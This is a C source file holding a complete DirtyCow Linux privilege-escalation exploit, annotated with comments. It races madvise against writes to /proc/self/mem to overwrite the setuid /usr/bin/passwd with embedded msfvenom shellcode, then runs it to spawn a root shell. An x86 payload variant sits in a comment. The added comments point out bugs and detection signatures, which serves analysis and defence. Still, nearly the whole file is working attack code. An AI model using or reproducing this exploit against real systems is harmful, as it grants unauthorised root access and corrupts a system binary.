  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <sys/mman.h>
  4. #include <fcntl.h>
  5. #include <pthread.h>
  6. #include <string.h>
  7. #include <unistd.h>
  8.  
// Shared state for the three worker threads started in main. All of these are
// plain (non-atomic, unlocked) globals written in one thread and read in
// another; nothing in this file orders those accesses.
void *map;                 // private, read-only mmap of suid_binary (set in main)
int f;                     // fd of suid_binary, opened O_RDONLY in main
int stop = 0;              // set to 1 by waitForWrite; ends the two racing loops
struct stat st;            // fstat() of suid_binary; st.st_size sizes payload and map
char *name;                // not referenced anywhere in this listing
pthread_t pth1,pth2,pth3;  // madviseThread, procselfmemThread, waitForWrite; only pth3 is joined

// change if no permissions to read
// The target file. main reads, fstat()s and mmap()s it, and waitForWrite
// re-opens it for comparison, so it must be readable by the running user.
// It is a fixed literal here; system() is later given this string directly.
char suid_binary[] = "/usr/bin/passwd";
  18.  
/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
// Replacement contents for the target file: a complete 64-bit ELF image
// (it begins with the 0x7f 'E' 'L' 'F' magic) emitted by the command above.
// main copies it to the front of a st.st_size-byte buffer, and waitForWrite
// decides the race has succeeded when the first sc_len bytes on disk equal it.
// Detection note: a setuid binary whose leading bytes change to this image,
// alongside the /tmp/bak copy created by main, is the on-disk artefact left behind.
unsigned char sc[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
// Number of bytes in sc[] (14 rows of 12 plus a row of 9 = 177). Used as the
// write length in procselfmemThread and the read/compare length in waitForWrite;
// it is kept by hand rather than derived from sizeof sc, so the two can drift apart.
unsigned int sc_len = 177;
  40.  
  41. /*
  42. * $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
  43. unsigned char sc[] = {
  44. 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  45. 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  46. 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  47. 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  48. 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  49. 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  50. 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  51. 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  52. 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  53. 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  54. 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  55. 0x89, 0xe1, 0xcd, 0x80
  56. };
  57. unsigned int sc_len = 136;
  58. */
  59.  
// Thread 1 of the race. Repeatedly tells the kernel to drop the pages backing
// the start of `map` (madvise acts on whole pages, so the length of 100 means
// the first page) for up to 1000000 iterations or until `stop` is set.
// Together with procselfmemThread this is the two-thread pattern of the
// "DirtyCow" kernel race named in main; a kernel carrying the fix for that
// race simply completes both loops with no effect on the file.
// `arg` is suid_binary from main; it is copied into `str` and never used.
// The function is declared to return void* but has no return statement, so
// pthread_join on it would read an indeterminate value (main never joins it).
void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
// c sums madvise's return codes but is never examined or reported
for(i=0;i<1000000 && !stop;i++) {
c+=madvise(map,100,MADV_DONTNEED);
}
printf("thread stopped\n");
}
  70.  
// Thread 2 of the race. Opens this process's own memory file and, for up to
// 1000000 iterations or until `stop` is set, seeks to the address of `map`
// and writes sc_len bytes of `arg` (the payload buffer built in main) there.
// `map` itself is PROT_READ/MAP_PRIVATE, so the writes go through
// /proc/self/mem rather than through the mapping; while madviseThread keeps
// discarding the same page, an unpatched kernel can (as the program's
// "DirtyCow" label implies) apply such a write to the shared page cache of
// the underlying file instead of to a private copy.
// Detection note: a process holding /proc/self/mem O_RDWR while looping on
// madvise(MADV_DONTNEED) is the runtime signature of this pattern.
// The local `f` shadows the global fd `f`, the /proc/self/mem descriptor is
// never closed, and `lseek(f,map,SEEK_SET)` passes a void* where an off_t is
// expected (an implicit pointer-to-integer conversion). `str` is `arg` as char*.
// Declared void* but never returns a value.
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
// c sums write()'s return values but is never examined or reported
for(i=0;i<1000000 && !stop;i++) {
lseek(f,map,SEEK_SET);
c+=write(f, str, sc_len);
}
printf("thread stopped\n");
}
  83.  
// Thread 3: the monitor. Once a second it re-opens the target file and compares
// its first sc_len bytes with sc; when they match it sets `stop` (ending the two
// racing loops), prints the two messages and runs the target through system().
// `arg` is unused (main passes NULL). Declared void* but never returns a value;
// main joins only this thread, so its completion is what ends the program.
// Neither fopen's result nor fread's item count is checked, and on the
// matching iteration `break` skips the fclose, leaving that FILE* open.
// "/tmp/bak" refers to the copy of suid_binary that main makes before racing.
void *waitForWrite(void *arg) {
char buf[sc_len];   // VLA sized by the global sc_len

for(;;) {
FILE *fp = fopen(suid_binary, "rb");

fread(buf, sc_len, 1, fp);

// the on-disk file now begins with sc: the race has landed
if(memcmp(buf, sc, sc_len) == 0) {
printf("%s overwritten\n", suid_binary);
break;
}

fclose(fp);
sleep(1);
}

stop = 1;

printf("Popping root shell.\n");
printf("Don't forget to restore /tmp/bak\n");

system(suid_binary);
}
  108.  
// Entry point. Sequence:
//   1. copy suid_binary to /tmp/bak with a shell `cp` (string-built command;
//      safe from injection only because suid_binary is a fixed literal in this file);
//   2. open and fstat the target; allocate a st.st_size-byte payload of 0x90
//      filler with sc at the front;
//   3. mmap the target read-only and private;
//   4. start the three threads and wait only for waitForWrite (pth3).
// argc/argv are unused. No return value is checked: asprintf, system, open,
// fstat, mmap and all three pthread_create calls may fail silently.
// Other things a reader should know:
//   - `printf("%d", st.st_size)` passes an off_t to an int conversion;
//   - `memcpy(payload, sc, sc_len+1)` copies one byte more than sc holds;
//   - `payload` is a VLA the size of the whole target file, placed on the stack;
//   - `backup` from asprintf is never freed and `f` is never closed.
int main(int argc,char *argv[]) {
char *backup;

printf("DirtyCow root privilege escalation\n");
printf("Backing up %s to /tmp/bak\n", suid_binary);

// the backup is also the main on-disk artefact this program leaves behind
asprintf(&backup, "cp %s /tmp/bak", suid_binary);
system(backup);

f = open(suid_binary,O_RDONLY);
fstat(f,&st);

printf("Size of binary: %d\n", st.st_size);

// sc followed by 0x90 (x86 NOP) padding out to the target's full size
char payload[st.st_size];
memset(payload, 0x90, st.st_size);
memcpy(payload, sc, sc_len+1);

// read-only private mapping: the racing threads never write through it directly
map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);

printf("Racing, this may take a while..\n");

pthread_create(&pth1, NULL, &madviseThread, suid_binary);
pthread_create(&pth2, NULL, &procselfmemThread, payload);
pthread_create(&pth3, NULL, &waitForWrite, NULL);

// only the monitor is joined; pth1/pth2 end on their own via `stop` or the iteration cap
pthread_join(pth3, NULL);

return 0;
}